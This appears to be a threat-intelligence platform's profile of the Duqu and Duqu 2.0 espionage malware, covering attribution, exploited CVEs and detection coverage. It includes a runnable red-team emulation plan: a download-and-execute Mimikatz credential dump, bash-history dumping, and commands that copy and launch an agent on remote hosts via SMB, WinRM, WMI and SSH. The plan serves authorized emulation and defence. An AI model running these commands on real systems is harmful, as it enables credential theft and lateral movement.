Home/Threat Actor/Duqu / Duqu 2.0
Threat Actor

Duqu / Duqu 2.0

duqu · us_israel_joint_offensive_cyber_speculation · active since 2007

Duqu / Duqu 2.0 (canonical Symantec / CrySyS Duqu naming after Duqu's RPC component creating files prefixed with ~DQ per CrySyS Lab September 1, 2011 canonical discovery.

Duqu 2.0 successor variant per Kaspersky June 10, 2015 self-targeting canonical disclosure.

CrySyS Lab Duqu 2.0 alternative naming "the resurrection of Duqu".

cluster-cell-significant Tilded platform shared codebase with Stuxnet per Kaspersky December 2011 canonical attribution, "platform, which has been dubbed 'Tilded' because of the tendency of its creators to use files that start with the tilde symbol (~), was used for the creation of Stuxnet and Duqu, and also other malicious programs") is a cyber-espionage malware cluster operationally adjacent to Stuxnet Olympic Games operation, operationally significant as the canonical Stuxnet shared-codebase sibling cluster + the first publicly-known major cyber-attack against a cybersecurity research vendor (Duqu 2.0 Kaspersky Lab self-targeting June 2015).

speculatively attributed to US-Israel joint offensive cyber operation (cluster cell coherence with Stuxnet Olympic Games operation) per Kaspersky Tilded platform shared- codebase attribution + Symantec Stuxnet-Duqu code overlap analysis (three points of interest: installer exploits zero-day Windows kernel vulnerabilities; components signed with stolen digital keys.

Duqu and Stuxnet both highly targeted and related to nuclear program of Iran), with Duqu 2.0 variant operationally attributed to Israeli Unit 8200 specifically per NYT June 2015 ("believed to be the work of Unit 8200, an Israeli Intelligence Corps unit of the Israel Defense Forces", most specific public attribution of any Olympic Games cluster)

Duqu original operationally conducting cyber-espionage / industrial-control-system-design-information-gathering precursor to Stuxnet operational deployment (operationally a reconnaissance / pre-operational stage of broader Olympic Games campaign)

signature CVE-2011-3402 TrueType font parsing kernel zero-day initial access vector via malicious Microsoft Word document delivery.

signature stolen Taiwanese code signing certificates (C-Media Electronics + Foxconn, operationally similar to but distinct from Stuxnet's Realtek + JMicron stolen Taiwanese certificates, revoked October 14, 2011)

signature JPEG image-file C2 traffic concealment (encrypted data appended to harmless image files, steganography-adjacent)

Duqu 2.0 successor variant operationally targeting Kaspersky Lab itself (signature first publicly- known major cyber-attack against cybersecurity research vendor, Kaspersky Lab networks compromised for months without knowledge per Eugene Kaspersky Forbes June 2015 acknowledgment "most probably carried out by a government-backed group".

Symantec Gavin O'Gorman commentary "Attacking a security company, and what clearly is a nation-state attacker going after a private security company that is meant to be protecting customers and so on - is quite galling") + P5+1 Iran nuclear deal negotiations venues in hotels of Austria + Switzerland (sites of international negotiations with Iran over nuclear program and economic sanctions) + Western organizations operating in Asia and Middle East + IT security firms.

Duqu 2.0 signature multi-zero-day operational chain (CVE-2015- 2360 kernel + CVE-2014-4148 TrueType font + CVE-2014- 6324 Kerberos privilege escalation) + signature in-memory-only persistence tradecraft (no on-disk persistence, operationally designed to defeat forensic recovery via reboot, with traffic concealment via JPEG + GIF image-file appended encrypted data + multiple user agent strings HTTP C2 obfuscation per Infosec Institute)

signature trusted-process injection via antivirus product detection (Duqu maintains list of known AV products for services.exe + lsass.exe trusted-process injection target selection per Symantec, with 0xb3 0x1f XOR encrypted strings pattern)

fills the 3rd Olympic Games / US-Israel joint cyber-operations cell in the curated corpus following Stuxnet (1st) + Flame (2nd), operationally completing the canonical Olympic Games / US-Israel joint cyber-operations cluster cell with Stuxnet (cyber-sabotage) + Flame (cyber-espionage massive modular platform) + Duqu/Duqu 2.0 (cyber-espionage Stuxnet-sibling reconnaissance + diplomatic venue signals intelligence + cybersecurity research vendor self-targeting) capability cell coherence.

continued industry reference status as canonical Stuxnet shared- codebase Tilded platform sibling cluster + first publicly-known major cyber-attack against cybersecurity research vendor cited in essentially all subsequent Olympic Games + state-actor-tier cyber-espionage platform industry analyses through 2011-2026 period.

us_israel_joint_offensive_cyber_speculation confidence: high 16 aliases
Sigma rules200 YARA rules12 Live IOCs0 CVEs exploited4

Profile

Duqu / Duqu 2.0 (canonical Symantec / CrySyS Duqu naming after Duqu's RPC component creating files prefixed with ~DQ.

Duqu 2.0 successor variant per Kaspersky June 10, 2015 self-targeting canonical disclosure.

CrySyS Lab Duqu 2.0 alternative naming "the resurrection of Duqu".

cluster-cell-significant Tilded platform shared codebase with Stuxnet per Kaspersky December 2011 canonical attribution) is a cyber-espionage malware cluster operationally adjacent to Stuxnet Olympic Games operation, operationally significant as the canonical Stuxnet shared-codebase sibling cluster + the first publicly-known major cyber-attack against a cybersecurity research vendor (Duqu 2.0 Kaspersky self-targeting June 2015). Operationally signature for: (a) Tilded platform shared codebase with Stuxnet establishing cluster-cell coherence within Olympic Games / US-Israel joint cyber-operations cell.

(b) cyber-espionage precursor / industrial-control-system-design-information-gathering mission objective complementary to Stuxnet cyber- sabotage.

(c) Duqu 2.0 cluster-cell-significant Kaspersky-self-targeting + P5+1 Iran nuclear deal negotiations venues targeting.

(d) signature Israeli Unit 8200 specific attribution per NYT June 2015, most specific public attribution of any Olympic Games cluster. Operational phases: (1) TILDED PLATFORM ORIGIN (c. 2007-2008). Shared codebase platform development with Stuxnet. (2) DUQU EARLIEST DOCUMENTED ACTIVITY (c. 2008-2011). Cyber-espionage precursor to Stuxnet. (3) DUQU CRYSYS CANONICAL DISCOVERY (September 1, 2011). (4) SYMANTEC STUXNET-DUQU CODE OVERLAP ANALYSIS (October 2011). (5) DUQU TAIWANESE STOLEN CERTIFICATE REVOCATION (October 14, 2011). (6) KASPERSKY TILDED PLATFORM ATTRIBUTION (December 2011). (7) DUQU 2.0 KASPERSKY SELF-TARGETING DISCLOSURE (June 10, 2015). First publicly-known major cyber-attack against a cybersecurity research vendor. (8) DUQU 2.0 P5+1 IRAN NUCLEAR DEAL VENUES TARGETING (2014-2015). Austrian + Swiss hotels targeting. (9) NEW YORK TIMES UNIT 8200 ATTRIBUTION (June 2015). Most specific public attribution of any Olympic Games cluster. (10) CONTINUED INDUSTRY REFERENCE STATUS (2011-2026).

Signature operational tradecraft
  • Tilded platform shared codebase with Stuxnet (cluster-defining): per Kaspersky December 2011, "the platform... was used for the creation of Stuxnet and Duqu, and also other malicious programs.".
  • TrueType font parsing kernel zero-day initial access vector (signature): CVE-2011-3402 via malicious Microsoft Word document, Duqu original signature 0day.
  • Stolen Taiwanese code signing certificates (signature): C-Media Electronics + Foxconn stolen Taiwanese code signing certificates (operationally similar to but distinct from Stuxnet's Realtek + JMicron stolen Taiwanese certificates).
  • JPEG/GIF image-file C2 traffic concealment (signature): encrypted data appended to harmless image files, signature steganography-adjacent C2.
  • Duqu 2.0 in-memory-only persistence (signature evolution): no on-disk persistence, operationally designed to defeat forensic recovery via reboot.
  • Duqu 2.0 multi-zero-day operational chain (signature): CVE-2015-2360 + CVE-2014-4148 + CVE-2014-6324.
  • Duqu 2.0 Kaspersky-self-targeting (cluster-cell- significant): first publicly-known major cyber-attack against cybersecurity research vendor.
  • Duqu 2.0 P5+1 nuclear deal venues targeting (signature): Austrian + Swiss hotels hosting Iran nuclear deal international negotiations.
  • Israeli Unit 8200 NYT attribution (signature): most specific public attribution of any Olympic Games cluster.
  • Trusted-process injection via antivirus product detection (signature): per Symantec, Duqu maintains list of known antivirus products for trusted-process injection target selection (services.exe + lsass.exe). The cluster fills the 3rd Olympic Games / US-Israel joint cyber-operations cell in this curated corpus following stuxnet (1st) + flame (2nd). Operationally completes the canonical Olympic Games / US-Israel joint cyber-operations cluster cell with Stuxnet (cyber- sabotage) + Flame (cyber-espionage massive modular platform) + Duqu/Duqu 2.0 (cyber-espionage Stuxnet- sibling reconnaissance + diplomatic venue + self- targeting attack).

Aliases

16
duquduqu_malwareduqu_wormduqu_trojanduqu_2duqu 2.0duqu_2_0duqu_resurrectiontilded_platformtilded platformtilde_platformduqu stuxnet siblingduqu cyber espionage precursorduqu 2.0 kaspersky self-targeting 2015duqu unit 8200 israelduqu p5+1 iran nuclear deal venues 2015

Adversary Emulation Plan

13 steps
Runnable Caldera emulation profile Worm - Move laterally any way possible. Ordered along the attack lifecycle; each step maps to an ATT&CK technique with a concrete executor command. For authorized red-team / purple-team exercises only.
0 collection T1005 · Data from Local System darwin, linux
Parse SSH config
pip install stormssh && storm list
1 credential-access T1552.003 · Unsecured Credentials: Bash History darwin, linux
Dump history
find ~/.bash_sessions -name '*' -exec cat {} \; 2>/dev/null
2 discovery T1135 · Network Share Discovery windows
View admin shares
Get-SmbShare | ConvertTo-Json
3 discovery T1018 · Remote System Discovery darwin, linux, windows
Collect ARP details
arp -a
4 credential-access T1003.001 · OS Credential Dumping: LSASS Memory windows
Run PowerKatz
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $True };
$web = (New-Object System.Net.WebClient);
$result = $web.DownloadString("https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/4c7a2016fc7931cd37273c5d8e17b16d959867b3/Exfiltration/Invoke-Mimikatz.ps1");
iex $result; Invoke-Mimikatz -DumpCreds
5 discovery T1018 · Remote System Discovery windows
Find Hostname
nbtstat -A #{remote.host.ip}
6 discovery T1018 · Remote System Discovery windows
Reverse nslookup IP
nslookup #{remote.host.ip}
7 lateral-movement T1021.002 · Remote Services: SMB/Windows Admin Shares windows
Mount Share
net use \\#{remote.host.fqdn}\C$ /user:#{domain.user.name} #{domain.user.password}
8 lateral-movement T1021.002 · Remote Services: SMB/Windows Admin Shares windows
Copy 54ndc47 (SMB)
$path = "sandcat.go-windows";
$drive = "\\#{remote.host.fqdn}\C$";
Copy-Item -v -Path $path -Destination $drive"\Users\Public\s4ndc4t.exe";
9 lateral-movement T1570 · Lateral Tool Transfer windows, darwin, linux
Copy 54ndc47 (WinRM and SCP)
$job = Start-Job -ScriptBlock {
  $username = "#{domain.user.name}";
  $password = "#{domain.user.password}";
  $secstr = New-Object -TypeName System.Security.SecureString;
  $password.ToCharArray() | ForEach-Object {$secstr.AppendChar($_)};
  $cred = New-Object -Typename System.Management.Automation.PSCredential -Argumentlist $username, $secstr;
  $session = New-PSSession -ComputerName "#{remote.host.name}" -Credential $cred;
  $location = "#{location}";
  $exe = "#{exe_name}";
  Copy-Item $location -Destination "C:\Users\Public\svchost.exe" -ToSession $session;
  Start-Sleep -s 5;
  Remove-PSSession -Session $session;
};
Receive-Job -Job $job -Wait;
10 execution T1047 · Windows Management Instrumentation windows
Start 54ndc47 (WMI)
$node = '''#{remote.host.fqdn}''';
$user = '''#{domain.user.name}''';
$password = '''#{domain.user.password}''';
wmic /node:$node /user:$user /password:$password process call create "powershell.exe C:\Users\Public\s4ndc4t.exe -server #{server} -group #{group}";
11 lateral-movement T1021.006 · Remote Services: Windows Remote Management windows
Start Agent (WinRM)
$username = "#{domain.user.name}";
$password = "#{domain.user.password}";
$secstr = New-Object -TypeName System.Security.SecureString;
$password.ToCharArray() | ForEach-Object {$secstr.AppendChar($_)};
$cred = New-Object -Typename System.Management.Automation.PSCredential -Argumentlist $username, $secstr;
$session = New-PSSession -ComputerName #{remote.host.name} -Credential $cred;
Invoke-Command -Session $session -ScriptBlock{start-job -scriptblock{cmd.exe /c start C:\Users\Public\svchost.exe -server #{server} }};
Start-Sleep -s 5;
Remove-PSSession -Session $session;
12 lateral-movement T1021.004 · Remote Services: SSH darwin, linux
Start 54ndc47
scp -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -o ConnectTimeout=3 sandcat.go-darwin #{remote.ssh.cmd}:~/sandcat.go &&
ssh -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -o ConnectTimeout=3 #{remote.ssh.cmd} 'nohup ./sandcat.go -server #{server} -group red 1>/dev/null 2>/dev/null &'

Notable Campaigns

13
2015Duqu 2.0 Kaspersky Self-Targeting Disclosure (June 10, 2015)
2015Duqu 2.0 In-Memory Persistence Tradecraft
2015New York Times Unit 8200 Attribution (June 2015)
2014-2015Duqu 2.0 Zero-Day Operational Chain (2014-2015)
2014-2015Duqu 2.0 P5+1 Iran Nuclear Deal Negotiations Venues Targeting (2014-2015)
2011-2026Continued Industry Reference Status (2011-2026)
2011-2012CVE-2011-3402 TrueType Font Kernel Zero-Day Microsoft Patch
2011Symantec Stuxnet-Duqu Code Overlap Analysis (October 2011)
2011Kaspersky Tilded Platform Attribution (December 2011)
2011Duqu Taiwanese Stolen Certificate Revocation (October 14, 2011)
2011Duqu CrySyS Canonical Discovery (September 1, 2011)
2008-2011Duqu Earliest Documented Activity (c. 2008-2011)
2007-2008Tilded Platform Origin (c. 2007-2008)

Attribution & Reporting

Attributed by
CrySyS Lab Budapest University of Technology and Economics (canonical Duqu discovery September 1 2011 + Duqu 2.0 analysis 2015)Kaspersky GReAT (canonical Tilded platform attribution December 2011 + Duqu 2.0 self-targeting disclosure June 10 2015)Symantec (Duqu technical analysis + Stuxnet-Duqu code overlap analysis)Dell SecureWorks (initial Duqu-Stuxnet relationship skepticism, subsequently superseded by Kaspersky Tilded attribution)New York Times (canonical Duqu 2.0 Israeli Unit 8200 attribution June 2015)Eugene Kaspersky (Kaspersky Lab CEO, canonical Duqu 2.0 self-targeting acknowledgment Forbes June 2015)Gavin O'Gorman (Symantec Security Response Team)Unit 8200 IDF (signature attribution per NYT)Microsoft Security Response Center (CVE-2011-3402 TrueType kernel zero-day patch)F-Secure (Mikko Hyppönen historical analysis)Trend Micro (Duqu adjacent analysis)MAHER Center Iranian National CERT (Duqu Iranian impact analysis)
Key reporting
reportCrySyS Lab Budapest University of Technology and Economics (Bencsáth + Pék + Buttyán + Félegyházi): Duqu, A Stuxnet-like malware found in the wild (September 1, 2011), canonical Duqu discovery + analysis
reportKaspersky Lab GReAT: Stuxnet/Duqu, The Evolution of Drivers (December 2011), canonical Tilded platform attribution
reportSymantec: W32.Duqu, The Precursor to the Next Stuxnet (October 2011), canonical Symantec Duqu analysis
reportKaspersky Lab GReAT (Igor Soumenkov + Eugene Kaspersky): Duqu 2.0, A new sophisticated malware platform exploiting up to three zero-day vulnerabilities (June 10, 2015), canonical Duqu 2.0 self-targeting disclosure
reportCrySyS Lab: The resurrection of Duqu (2015), canonical academic Duqu 2.0 follow-up analysis
reportNew York Times: Israeli Spy Discovered in Kaspersky Lab Networks (June 11, 2015), canonical Israeli Unit 8200 attribution
reportEugene Kaspersky (Forbes, June 2015): Kaspersky Lab Duqu 2.0 self-targeting acknowledgment
reportSymantec (Gavin O'Gorman): Duqu 2.0 commentary, 'nation-state attacker going after a private security company'
reportF-Secure: Duqu / Duqu 2.0 historical analysis
reportInfosec Institute: Duqu 2.0, The most sophisticated malware ever seen (2015)
reportBankInfoSecurity: Duqu 2.0 Espionage Malware Discovered (June 2015)
reportDell SecureWorks: Initial Duqu-Stuxnet relationship skepticism analysis (subsequently superseded by Tilded attribution)
reportMITRE ATT&CK Software S0038: Duqu
reportMalpedia Software Profile: Duqu

Operational

State sponsor

Speculatively attributed to US-Israel joint offensive cyber operation (cluster cell coherence with Stuxnet Olympic Games operation) per multiple convergent analyses, with Duqu 2.0 variant operationally attributed to Israeli Unit 8200 specifically per New York Times reporting following Kaspersky June 10, 2015 Duqu 2.0 self-targeting disclosure. Cluster-cell-coherence attribution basis: (1) Kaspersky Tilded platform shared codebase attribution (December 2011): per Kaspersky press release December 2011: "The platform, which has been dubbed 'Tilded' (because of the tendency of its creators to use files that start with the tilde symbol (~)), in the opinion of Kaspersky Lab's experts was used for the creation of Stuxnet and Duqu, and also other malicious programs. The connection between Duqu and Stuxnet was revealed during the analysis of one of the incidents with regard to Duqu. During the investigation of the infected system thought to have been attacked in August 2011, a driver was found that was similar to the one used by one of the versions of Stuxnet. Though there were clear likenesses between the two drivers, there were also some differences in the details, such as the date of signing of the digital certificate." The Tilded platform attribution operationally established the canonical Stuxnet-Duqu shared-codebase platform attribution. (2) Symantec Stuxnet-Duqu code overlap analysis: per HandWiki canonical compilation: "Experts compared the similarities and found three points of interest: The installer exploits zero-day Windows kernel vulnerabilities. Components are signed with stolen digital keys. Duqu and Stuxnet are both highly targeted and related to the nuclear program of Iran. Like Stuxnet, Duqu attacks Microsoft Windows systems using a zero-day vulnerability." Per Symantec: "Duqu injection target selection is very similar to the mechanism of Stuxnet." (3) Mission objective complementarity to Stuxnet: per industry analysis: Duqu was operationally cyber- espionage / industrial-control-system-design-information- gathering precursor to Stuxnet, operationally a reconnaissance / pre-operational stage of the broader Olympic Games campaign. Per BankInfoSecurity: "Malware researchers have previously suggested that whoever commissioned Stuxnet, which was found in 2010, also had a hand in Duqu, which was discovered in 2011. Stuxnet was allegedly the product of a U.S.-Israeli cyberweapons program code-named Olympic Games, although the White House has never confirmed those allegations." (4) Duqu 2.0 Israeli Unit 8200 specific attribution (signature): per Wikipedia Duqu 2.0 entry: "The malware, which infected Kaspersky Lab for months without their knowledge, is believed to be the work of Unit 8200, an Israeli Intelligence Corps unit of the Israel Defense Forces. The New York Times alleges this breach of Kaspersky in 2014 is what allowed Israel to notify the US of Russian hackers using Kaspersky software to retrieve sensitive data." The Duqu 2.0 Israeli Unit 8200 attribution operationally established the most specific public attribution of any Olympic Games cluster (operationally more specific than Stuxnet US-Israel general attribution or Flame US-Israel speculative attribution). Operational mission objective (Duqu original 2011): Duqu operationally conducted cyber-espionage targeting manufacturers of industrial control systems and other organizations related to Iran's nuclear program. Operationally a precursor / reconnaissance phase of Olympic Games campaign, collected design information and ICS topology mapping that subsequently informed Stuxnet operational development. Operational mission objective (Duqu 2.0 2015): Per Infosec Institute + BankInfoSecurity + Wikipedia: Duqu 2.0 operationally targeted: (a) Kaspersky Lab itself (operationally significant threat-research-vendor self-targeting attack, Kaspersky Lab networks compromised for months without knowledge until Duqu 2.0 detection) (b) P5+1 Iran nuclear deal negotiations venues in hotels of Austria + Switzerland (sites of international negotiations with Iran over its nuclear program and economic sanctions) (c) Other Western organizations and entities operating in Asia and the Middle East (d) IT security firms (operationally significant threat-research-industry targeting pattern) Per Eugene Kaspersky (Kaspersky Lab CEO) Forbes June 2015 statement: Duqu 2.0 "most probably carried out by a government-backed group".

"While they managed to get access to data related to our R&D and new technologies ... our customers and partners were not affected and are not at risk." Per Kaspersky: cannot ascribe a plausible motive to why Duqu gang would want to infiltrate Kaspersky Lab networks unless it was to keep tabs on the company's investigation techniques and findings.

Per Gavin O'Gorman (Symantec Security Response Team member): "Attacking a security company
  • and what clearly is a nation-state attacker going after a private security company that is meant to be protecting customers and so on.
  • is quite galling." Operational discovery + disclosure context: (a) CrySyS Lab September 1, 2011 canonical Duqu discovery: original Duqu malware and related attack platform were first discovered on September 1, 2011 by the Laboratory of Cryptography and System Security (CrySyS) at the Budapest University of Technology and Economics. CrySyS Lab disclosed Duqu via subsequent published analysis. Per HandWiki: "Duqu is a collection of computer malware discovered on 1 September 2011, thought by Kaspersky Labs to be related to the Stuxnet worm and to have been created by Unit 8200." (b) Stuxnet-Duqu relationship establishment timing: per HandWiki: "Another source, Dell SecureWorks, reports that Duqu may not be related to Stuxnet. However, there is considerable and growing evidence that Duqu is closely related to Stuxnet." Subsequent Kaspersky December 2011 Tilded platform attribution operationally consolidated Stuxnet-Duqu relationship establishment. (c) Duqu 2.0 Kaspersky-self-targeting disclosure June 10, 2015: Kaspersky discovered Duqu 2.0 infection in Kaspersky Lab's own networks early 2015 and published canonical disclosure June 10, 2015. Per CrySyS Lab: "After analyzing the samples that we received, we think that the attackers behind the Duqu malware are back and active", CrySyS naming "the resurrection of Duqu." Operational classification: nation-state-tier cyber- espionage operation operationally adjacent to Stuxnet Olympic Games cluster, operationally signature for (a) Tilded platform shared codebase with Stuxnet establishing cluster-cell coherence; (b) cyber- espionage precursor mission objective to Stuxnet; (c) Duqu 2.0 cluster-cell-significant Kaspersky-self- targeting + P5+1 nuclear deal venues targeting with specific Israeli Unit 8200 NYT attribution. The cluster fills the 3rd Olympic Games / US-Israel joint cyber-operations cell in this curated corpus following stuxnet (1st) + flame (2nd). Operationally significant as the canonical Stuxnet shared-codebase sibling cluster + signature first publicly-known major cyber-attack against a cybersecurity research vendor (Duqu 2.0 Kaspersky self-targeting).
Motivations
cyber_espionage_precursor_reconnaissance_for_stuxnet_olympic_games, industrial_control_system_design_information_gathering, iranian_nuclear_program_related_organization_targeting, duqu_2_0_p5_plus_1_iran_nuclear_deal_negotiations_targeting, duqu_2_0_kaspersky_threat_research_vendor_self_targeting, duqu_2_0_western_organizations_asia_middle_east_targeting, tilded_platform_shared_codebase_stuxnet_olympic_games_cluster_cell_coherence, signature_unit_8200_israeli_attribution_per_nyt_duqu_2_0, threat_research_vendor_intelligence_collection_capability, p5_plus_1_diplomatic_venue_signals_intelligence_collection
Sectors
industrial_control_system_manufacturersics_design_information_targetsiranian_nuclear_program_related_organizationsmanufacturingcybersecurity_research_vendorsthreat_intelligence_companiesp5_plus_1_iran_nuclear_deal_negotiations_venuesdiplomatic_venueshotels_diplomatic_negotiation_siteswestern_organizationsit_security_firmsgovernment_officialsforeign_ministry_officials
Regions
iransudanhungaryindiafrancenetherlandsaustriaswitzerlandgermanyrussiaunited_statesasia_broadlymiddle_east_broadly

Techniques Used

60
T1001T1001.002T1003T1003.001T1003.002T1005T1010T1014T1016T1020T1021T1021.002T1021.006T1027T1027.003T1027.005T1027.013T1029T1033T1036T1036.001T1036.005T1039T1041T1053T1056T1056.001T1057T1059T1059.001T1068T1070T1070.004T1071T1071.001T1071.002T1074T1078T1082T1083T1087T1090T1090.001T1090.002T1095T1102T1106T1113T1114T1114.001T1119T1123T1125T1129T1132T1133T1140T1185T1190T1203

Detection Blind Spots

60 techniques
Across this actor’s 60 mapped techniques, the share covered by each detection layer. Low bars are where you’d be blind if this actor targeted you.
Behavioral / log (Sigma)53/60 · 88%
Analytics (MITRE CAR)23/60 · 38%
Runtime / container (Falco)7/60 · 11%
File / malware (YARA)0/60 · 0%
Network (Suricata/Snort)16/60 · 26%
Vuln scan (Nuclei)0/60 · 0%

Atomic Test Plan

30 techniques
Runnable Atomic Red Team tests covering this actor’s mapped techniques - validate your detections against this specific adversary. Cross-reference the blind spots above. For authorized lab / purple-team use. Open the full builder

Tools Used

0 mapped
Other tooling / TTPs (curation, not ATT&CK-mapped):
MALICIOUS MICROSOFT WORD DOCUMENT WITH EMBEDDED TRUETYPE FONT EXPLOITMULTIPLE USER AGENT STRINGS HTTP C2 COMMUNICATIONSERVICES EXE TRUSTED PROCESS INJECTIONSTOLEN DIGITAL KEYS OVERLAP WITH STUXNET

CVEs Exploited

4
CVECVE-2011-3402
CVECVE-2014-4148
CVECVE-2014-6324
CVECVE-2015-2360
Intelligence Graph · click any node to traverse
CVETechnique ActorTool Family
drag to reposition · click any node to traverse · button top-right enlarges
External lookups - second-class, for what we don’t hold ourselves
MITRE searchMalpediaGoogle
Vulnerabilities
CISA KEV catalog
CWE weaknesses
CAPEC attack patterns
Package vulnerabilities
Threat intelligence
Threat actors
Tools & malware
ATT&CK techniques
IOCs
Detection & defense
Sigma rules
YARA rules
Atomic Red Team tests
D3FEND countermeasures
Compliance
NIST 800-53
ISO 27001:2022
SOC 2 TSC
PCI-DSS v4.0
CIS Controls v8.1
About
All capabilities
Live statistics
Data sources
Privacy policy
Terms of service
threatengine.sh  ·  Open-source threat intelligence platform  ·  100+ authoritative sources  ·  Every fact traces to its origin